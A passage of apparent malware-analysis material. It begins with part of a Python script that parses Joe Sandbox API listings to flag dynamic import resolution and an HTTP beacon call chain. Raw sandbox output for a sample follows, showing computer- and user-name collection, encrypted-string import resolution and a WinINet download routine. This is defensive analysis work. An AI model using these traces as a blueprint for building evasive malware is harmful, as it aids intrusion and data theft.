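    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), m["parent"]))
    return sorted(calls, key=lambda c: c.ref)


def hexarg(cell):
    """Numeric value of an 8-digit hex argument cell; None for "?" or a string."""
    return int(cell, 16) if re.fullmatch(r"[0-9A-F]{8}", cell) else None


# Win32 constants (values as defined in wininet.h).
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
REQUEST_FLAGS = {
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE", 0x00000200: "INTERNET_FLAG_NO_UI",
    0x00080000: "INTERNET_FLAG_NO_COOKIES", 0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x00800000: "INTERNET_FLAG_SECURE",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE", 0x80000000: "INTERNET_FLAG_RELOAD",
}


def decode_flags(value, table):
    """Names of the set bits found in `table`, plus any bits the table does not name."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    return names, value & ~sum(table)


def dynamic_resolution_summary(calls):
    """Count run-time import resolution per module base and list the export names
    passed in plaintext; the others are pointers to strings decrypted before the
    call, so only an address is visible in the report."""
    gpa = [c for c in calls if c.parent is None and c.api == "GetProcAddress"]
    loads = [c for c in calls if c.parent is None and c.api == "LoadLibraryA"]
    plaintext = sorted({c.args[1] for c in gpa if hexarg(c.args[1]) is None and c.args[1] != "?"})
    return {"GetProcAddress": len(gpa), "LoadLibraryA": len(loads),
            "per_module": dict(Counter(c.args[0] for c in gpa)), "plaintext_exports": plaintext}


BEACON_ORDER = ("InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                "HttpSendRequestA", "InternetReadFile")


def beacon_chain(calls):
    """True when the five WinINet calls of one HTTP exchange occur in call-site
    order, plus the decoded constants that characterise that exchange."""
    direct = [c for c in calls if c.parent is None and c.module == "WININET"]
    first_ref = {}
    for c in direct:                       # already sorted by ref
        first_ref.setdefault(c.api, c.ref)
    refs = [first_ref.get(api) for api in BEACON_ORDER]
    ordered = None not in refs and refs == sorted(refs)
    detail = {}
    for c in direct:
        if c.api == "InternetOpenA":       # dwAccessType is the 2nd argument
            detail["access_type"] = INTERNET_OPEN_TYPE.get(hexarg(c.args[1]), c.args[1])
        elif c.api == "InternetConnectA":  # dwService is the 6th argument
            detail["service"] = INTERNET_SERVICE.get(hexarg(c.args[5]), c.args[5])
        elif c.api == "HttpOpenRequestA":  # dwFlags is the 7th argument
            detail["request_flags"] = decode_flags(hexarg(c.args[6]), REQUEST_FLAGS)[0]
        elif c.api == "InternetReadFile":  # dwNumberOfBytesToRead is the 3rd argument
            detail["read_chunk"] = hexarg(c.args[2])
    return ordered, detail


if __name__ == "__main__":
    print(dynamic_resolution_summary(parse_api_lines(RESOLVER_LINES)))
    print(beacon_chain(parse_api_lines(BEACON_LINES)))
```

Sorting by call site is the design choice that matters: a report lists calls in discovery order, so ordering checks done on the raw listing would miss that HttpOpenRequestA sits between InternetConnectA and HttpSendRequestA. The argument positions are taken from the Win32 prototypes, which is only valid because Joe Sandbox prints the arguments in declaration order; the same script applied to a listing with "?" in those slots returns the raw cell instead of a constant name.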
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00FB792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 835719d76b3ea203905156543b944468e2a3375e9f0570272418ca8ee41b2ec1
                                    • Instruction ID: 956f6bc82b0e530cbc55540093fa929057c096b4d68c1883a414c6910ec286d9
                                    • Opcode Fuzzy Hash: 835719d76b3ea203905156543b944468e2a3375e9f0570272418ca8ee41b2ec1
                                    • Instruction Fuzzy Hash: 470162B1904205EBC714DFD5D945FAABBB8FB44B21F104229E555A7280D77459408BA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FA11B7), ref: 00FB7880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FB789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: a04bb21722a87135527dcb814ca5cac132ca86b829cdc8ed2ca0db00fb0f6850
                                    • Instruction ID: 5e4a00483e7a7b036c5c579192f605729323c33e93791009fd8e2abb5d9fb93f
                                    • Opcode Fuzzy Hash: a04bb21722a87135527dcb814ca5cac132ca86b829cdc8ed2ca0db00fb0f6850
                                    • Instruction Fuzzy Hash: 3AF04FB1D44208ABCB14DFD9D949FAEBBF8FB44711F10026AFA15A3680C77555448BA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: fa2c4395a7881c4de4c1513fa69653902d040942aa8ff09a9261228418276606
                                    • Instruction ID: 85527f3b8c3ae624b5626ee59eab297aadbf6824a1669d569e39817063fce08a
                                    • Opcode Fuzzy Hash: fa2c4395a7881c4de4c1513fa69653902d040942aa8ff09a9261228418276606
                                    • Instruction Fuzzy Hash: 38D01774D402089BCB14DAE0A84969DBBB8FB08212F000564E90662240EA3164C18BA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Basic blocks (id, address range, calls) and their successors:
                                    • 633 fb9c10-fb9c1a -> 634, 635
                                    • 634 fb9c20-fba031 GetProcAddress * 43 -> 635
                                    • 635 fba036-fba0ca LoadLibraryA * 8 -> 636, 637
                                    • 636 fba0cc-fba141 GetProcAddress * 5 -> 637
                                    • 637 fba146-fba14d -> 638, 639
                                    • 638 fba153-fba211 GetProcAddress * 8 -> 639
                                    • 639 fba216-fba21d -> 640, 641
                                    • 640 fba298-fba29f -> 642, 643
                                    • 641 fba21f-fba293 GetProcAddress * 5 -> 640
                                    • 642 fba337-fba33e -> 644, 645
                                    • 643 fba2a5-fba332 GetProcAddress * 6 -> 642
                                    • 644 fba41f-fba426 -> 646, 647
                                    • 645 fba344-fba41a GetProcAddress * 9 -> 644
                                    • 646 fba428-fba49d GetProcAddress * 5 -> 647
                                    • 647 fba4a2-fba4a9 -> 648, 649
                                    • 648 fba4ab-fba4d7 GetProcAddress * 2 -> 649
                                    • 649 fba4dc-fba4e3 -> 650, 651
                                    • 650 fba515-fba51c -> 652, 653
                                    • 651 fba4e5-fba510 GetProcAddress * 2 -> 650
                                    • 652 fba612-fba619 -> 654, 655
                                    • 653 fba522-fba60d GetProcAddress * 10 -> 652
                                    • 654 fba61b-fba678 GetProcAddress * 4 -> 655
                                    • 655 fba67d-fba684 -> 656, 657
                                    • 656 fba69e-fba6a5 -> 658, 659
                                    • 657 fba686-fba699 GetProcAddress -> 656
                                    • 658 fba708-fba709 (exit)
                                    • 659 fba6a7-fba703 GetProcAddress * 4 -> 658
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,008B52F0), ref: 00FB9C2D
                                    • GetProcAddress.KERNEL32(74DD0000,008B5550), ref: 00FB9C45
                                    • GetProcAddress.KERNEL32(74DD0000,008C9430), ref: 00FB9C5E
                                    • GetProcAddress.KERNEL32(74DD0000,008C9460), ref: 00FB9C76
                                    • GetProcAddress.KERNEL32(74DD0000,008C9478), ref: 00FB9C8E
                                    • GetProcAddress.KERNEL32(74DD0000,008C9490), ref: 00FB9CA7
                                    • GetProcAddress.KERNEL32(74DD0000,008BBE58), ref: 00FB9CBF
                                    • GetProcAddress.KERNEL32(74DD0000,008CD078), ref: 00FB9CD7
                                    • GetProcAddress.KERNEL32(74DD0000,008CCEF8), ref: 00FB9CF0
                                    • GetProcAddress.KERNEL32(74DD0000,008CCE80), ref: 00FB9D08
                                    • GetProcAddress.KERNEL32(74DD0000,008CD000), ref: 00FB9D20
                                    • GetProcAddress.KERNEL32(74DD0000,008B5330), ref: 00FB9D39
                                    • GetProcAddress.KERNEL32(74DD0000,008B5590), ref: 00FB9D51
                                    • GetProcAddress.KERNEL32(74DD0000,008B5510), ref: 00FB9D69
                                    • GetProcAddress.KERNEL32(74DD0000,008B5530), ref: 00FB9D82
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF28), ref: 00FB9D9A
                                    • GetProcAddress.KERNEL32(74DD0000,008CCDF0), ref: 00FB9DB2
                                    • GetProcAddress.KERNEL32(74DD0000,008BBED0), ref: 00FB9DCB
                                    • GetProcAddress.KERNEL32(74DD0000,008B55D0), ref: 00FB9DE3
                                    • GetProcAddress.KERNEL32(74DD0000,008CD030), ref: 00FB9DFB
                                    • GetProcAddress.KERNEL32(74DD0000,008CCE98), ref: 00FB9E14
                                    • GetProcAddress.KERNEL32(74DD0000,008CD0A8), ref: 00FB9E2C
                                    • GetProcAddress.KERNEL32(74DD0000,008CCEB0), ref: 00FB9E44
                                    • GetProcAddress.KERNEL32(74DD0000,008B5370), ref: 00FB9E5D
                                    • GetProcAddress.KERNEL32(74DD0000,008CCE08), ref: 00FB9E75
                                    • GetProcAddress.KERNEL32(74DD0000,008CD018), ref: 00FB9E8D
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF10), ref: 00FB9EA6
                                    • GetProcAddress.KERNEL32(74DD0000,008CD0C0), ref: 00FB9EBE
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF40), ref: 00FB9ED6
                                    • GetProcAddress.KERNEL32(74DD0000,008CD090), ref: 00FB9EEF
                                    • GetProcAddress.KERNEL32(74DD0000,008CCEC8), ref: 00FB9F07
                                    • GetProcAddress.KERNEL32(74DD0000,008CCE38), ref: 00FB9F1F
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF58), ref: 00FB9F38
                                    • GetProcAddress.KERNEL32(74DD0000,008CA880), ref: 00FB9F50
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF70), ref: 00FB9F68
                                    • GetProcAddress.KERNEL32(74DD0000,008CCF88), ref: 00FB9F81
                                    • GetProcAddress.KERNEL32(74DD0000,008B55F0), ref: 00FB9F99
                                    • GetProcAddress.KERNEL32(74DD0000,008CCFA0), ref: 00FB9FB1
                                    • GetProcAddress.KERNEL32(74DD0000,008B53B0), ref: 00FB9FCA
                                    • GetProcAddress.KERNEL32(74DD0000,008CCE20), ref: 00FB9FE2
                                    • GetProcAddress.KERNEL32(74DD0000,008CD048), ref: 00FB9FFA
                                    • GetProcAddress.KERNEL32(74DD0000,008B53F0), ref: 00FBA013
                                    • GetProcAddress.KERNEL32(74DD0000,008B5850), ref: 00FBA02B
                                    • LoadLibraryA.KERNEL32(008CCFB8,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA03D
                                    • LoadLibraryA.KERNEL32(008CCE50,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA04E
                                    • LoadLibraryA.KERNEL32(008CCDD8,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA060
                                    • LoadLibraryA.KERNEL32(008CCEE0,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA072
                                    • LoadLibraryA.KERNEL32(008CCE68,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA083
                                    • LoadLibraryA.KERNEL32(008CCFD0,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA095
                                    • LoadLibraryA.KERNEL32(008CCFE8,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA0A7
                                    • LoadLibraryA.KERNEL32(008CD060,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA0B8
                                    • GetProcAddress.KERNEL32(75290000,008B5770), ref: 00FBA0DA
                                    • GetProcAddress.KERNEL32(75290000,008CD210), ref: 00FBA0F2
                                    • GetProcAddress.KERNEL32(75290000,008C90D0), ref: 00FBA10A
                                    • GetProcAddress.KERNEL32(75290000,008CD1B0), ref: 00FBA123
                                    • GetProcAddress.KERNEL32(75290000,008B5810), ref: 00FBA13B
                                    • GetProcAddress.KERNEL32(73440000,008BB8E0), ref: 00FBA160
                                    • GetProcAddress.KERNEL32(73440000,008B5890), ref: 00FBA179
                                    • GetProcAddress.KERNEL32(73440000,008BB750), ref: 00FBA191
                                    • GetProcAddress.KERNEL32(73440000,008CD0F0), ref: 00FBA1A9
                                    • GetProcAddress.KERNEL32(73440000,008CD3C0), ref: 00FBA1C2
                                    • GetProcAddress.KERNEL32(73440000,008B5650), ref: 00FBA1DA
                                    • GetProcAddress.KERNEL32(73440000,008B59B0), ref: 00FBA1F2
                                    • GetProcAddress.KERNEL32(73440000,008CD2D0), ref: 00FBA20B
                                    • GetProcAddress.KERNEL32(752C0000,008B5610), ref: 00FBA22C
                                    • GetProcAddress.KERNEL32(752C0000,008B5930), ref: 00FBA244
                                    • GetProcAddress.KERNEL32(752C0000,008CD390), ref: 00FBA25D
                                    • GetProcAddress.KERNEL32(752C0000,008CD0D8), ref: 00FBA275
                                    • GetProcAddress.KERNEL32(752C0000,008B58F0), ref: 00FBA28D
                                    • GetProcAddress.KERNEL32(74EC0000,008BBB60), ref: 00FBA2B3
                                    • GetProcAddress.KERNEL32(74EC0000,008BBB88), ref: 00FBA2CB
                                    • GetProcAddress.KERNEL32(74EC0000,008CD1C8), ref: 00FBA2E3
                                    • GetProcAddress.KERNEL32(74EC0000,008B5790), ref: 00FBA2FC
                                    • GetProcAddress.KERNEL32(74EC0000,008B5870), ref: 00FBA314
                                    • GetProcAddress.KERNEL32(74EC0000,008BB908), ref: 00FBA32C
                                    • GetProcAddress.KERNEL32(75BD0000,008CD2E8), ref: 00FBA352
                                    • GetProcAddress.KERNEL32(75BD0000,008B5670), ref: 00FBA36A
                                    • GetProcAddress.KERNEL32(75BD0000,008C9150), ref: 00FBA382
                                    • GetProcAddress.KERNEL32(75BD0000,008CD300), ref: 00FBA39B
                                    • GetProcAddress.KERNEL32(75BD0000,008CD198), ref: 00FBA3B3
                                    • GetProcAddress.KERNEL32(75BD0000,008B56D0), ref: 00FBA3CB
                                    • GetProcAddress.KERNEL32(75BD0000,008B5690), ref: 00FBA3E4
                                    • GetProcAddress.KERNEL32(75BD0000,008CD318), ref: 00FBA3FC
                                    • GetProcAddress.KERNEL32(75BD0000,008CD1E0), ref: 00FBA414
                                    • GetProcAddress.KERNEL32(75A70000,008B5910), ref: 00FBA436
                                    • GetProcAddress.KERNEL32(75A70000,008CD3A8), ref: 00FBA44E
                                    • GetProcAddress.KERNEL32(75A70000,008CD258), ref: 00FBA466
                                    • GetProcAddress.KERNEL32(75A70000,008CD330), ref: 00FBA47F
                                    • GetProcAddress.KERNEL32(75A70000,008CD240), ref: 00FBA497
                                    • GetProcAddress.KERNEL32(75450000,008B58B0), ref: 00FBA4B8
                                    • GetProcAddress.KERNEL32(75450000,008B56B0), ref: 00FBA4D1
                                    • GetProcAddress.KERNEL32(75DA0000,008B57B0), ref: 00FBA4F2
                                    • GetProcAddress.KERNEL32(75DA0000,008CD108), ref: 00FBA50A
                                    • GetProcAddress.KERNEL32(6F070000,008B56F0), ref: 00FBA530
                                    • GetProcAddress.KERNEL32(6F070000,008B57F0), ref: 00FBA548
                                    • GetProcAddress.KERNEL32(6F070000,008B58D0), ref: 00FBA560
                                    • GetProcAddress.KERNEL32(6F070000,008CD228), ref: 00FBA579
                                    • GetProcAddress.KERNEL32(6F070000,008B5630), ref: 00FBA591
                                    • GetProcAddress.KERNEL32(6F070000,008B57D0), ref: 00FBA5A9
                                    • GetProcAddress.KERNEL32(6F070000,008B5970), ref: 00FBA5C2
                                    • GetProcAddress.KERNEL32(6F070000,008B5950), ref: 00FBA5DA
                                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00FBA5F1
                                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00FBA607
                                    • GetProcAddress.KERNEL32(75AF0000,008CD2A0), ref: 00FBA629
                                    • GetProcAddress.KERNEL32(75AF0000,008C9130), ref: 00FBA641
                                    • GetProcAddress.KERNEL32(75AF0000,008CD1F8), ref: 00FBA659
                                    • GetProcAddress.KERNEL32(75AF0000,008CD348), ref: 00FBA672
                                    • GetProcAddress.KERNEL32(75D90000,008B5710), ref: 00FBA693
                                    • GetProcAddress.KERNEL32(6CF70000,008CD360), ref: 00FBA6B4
                                    • GetProcAddress.KERNEL32(6CF70000,008B5990), ref: 00FBA6CD
                                    • GetProcAddress.KERNEL32(6CF70000,008CD270), ref: 00FBA6E5
                                    • GetProcAddress.KERNEL32(6CF70000,008CD378), ref: 00FBA6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 83e9e1355c5d12eaa079b6ee4e6339988b97d2ae7ff533b9ba8c2438a0b737e1
                                    • Instruction ID: b1cb67a2d188850e60ab5adc62b4382a7c8b144ce23648852ecedb0dd1f06738
                                    • Opcode Fuzzy Hash: 83e9e1355c5d12eaa079b6ee4e6339988b97d2ae7ff533b9ba8c2438a0b737e1
                                    • Instruction Fuzzy Hash: 5D620BB5940640AFC36CDBE8F5989563BF9EF8C701315853AB6268B24CD63A98C1DF50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Basic blocks (id, address range, calls) and their successors:
                                    • 1033 fa6280-fa630b call fba7a0, call fa47b0, call fba740, InternetOpenA, StrCmpCA -> 1040, 1041
                                    • 1040 fa630d -> 1041
                                    • 1041 fa6314-fa6318 -> 1042, 1043
                                    • 1042 fa6509-fa6525 call fba7a0, call fba800 * 2 -> 1061
                                    • 1043 fa631e-fa6342 InternetConnectA -> 1044, 1045
                                    • 1044 fa6348-fa634c -> 1048, 1049
                                    • 1045 fa64ff-fa6503 InternetCloseHandle -> 1042
                                    • 1048 fa635a -> 1051
                                    • 1049 fa634e-fa6358 -> 1051
                                    • 1051 fa6364-fa6392 HttpOpenRequestA -> 1053, 1054
                                    • 1053 fa6398-fa639c -> 1056, 1057
                                    • 1054 fa64f5-fa64f9 InternetCloseHandle -> 1045
                                    • 1056 fa639e-fa63bf InternetSetOptionA -> 1057
                                    • 1057 fa63c5-fa6405 HttpSendRequestA, HttpQueryInfoA -> 1059, 1060
                                    • 1059 fa642c-fa644b call fb8940 -> 1067, 1068
                                    • 1060 fa6407-fa6427 call fba740, call fba800 * 2 -> 1061
                                    • 1061 fa6528-fa652d (exit)
                                    • 1067 fa64c9-fa64e9 call fba740, call fba800 * 2 -> 1061
                                    • 1068 fa644d-fa6454 -> 1071, 1072
                                    • 1071 fa6456-fa6480 InternetReadFile -> 1076, 1077
                                    • 1072 fa64c7-fa64ef InternetCloseHandle -> 1054
                                    • 1076 fa648b -> 1072
                                    • 1077 fa6482-fa6489 -> 1076, 1080
                                    • 1080 fa648d-fa64c5 call fba9b0, call fba8a0, call fba800 -> 1071
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FA4839
                                      • Part of subcall function 00FA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • InternetOpenA.WININET(00FC0DFE,00000001,00000000,00000000,00000000), ref: 00FA62E1
                                    • StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA6303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA6335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA6385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FA63BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FA63D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FA63FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FA646D
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA64EF
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA64F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA6503
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 6f4e482215496a77cd326761de7a486976e7a1127a1e444f0afcafb9c636625a
                                    • Instruction ID: c1bb5a51e47107c328cd5708ac8d2e14dc0a8ea3f85dc46f627c21fc9a8df62b
                                    • Opcode Fuzzy Hash: 6f4e482215496a77cd326761de7a486976e7a1127a1e444f0afcafb9c636625a
                                    • Instruction Fuzzy Hash: D1715EB1A00218ABDB24DBE0DC55FEE77B8BF49700F108158F50AAB1C4DBB4AA85DF51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Basic blocks (id, address range, calls) and their successors:
                                    • 1090 fb5510-fb5577 call fb5ad0, call fba820 * 3, call fba740 * 4 -> 1106
                                    • 1106 fb557c-fb5583 -> 1107, 1108
                                    • 1107 fb55d7-fb564c call fba740 * 2, call fa1590, call fb52c0, call fba8a0, call fba800, call fbaad0, StrCmpCA -> 1134, 1138
                                    • 1108 fb5585-fb55b6 call fba820, call fba7a0, call fa1590, call fb51f0 -> 1124
                                    • 1124 fb55bb-fb55d2 call fba8a0, call fba800 -> 1134
                                    • 1134 fb5693-fb56a9 call fbaad0, StrCmpCA -> 1139, 1140
                                    • 1138 fb564e-fb568e call fba7a0, call fa1590, call fb51f0, call fba8a0, call fba800 -> 1134
                                    • 1139 fb56af-fb56b6 -> 1143, 1144
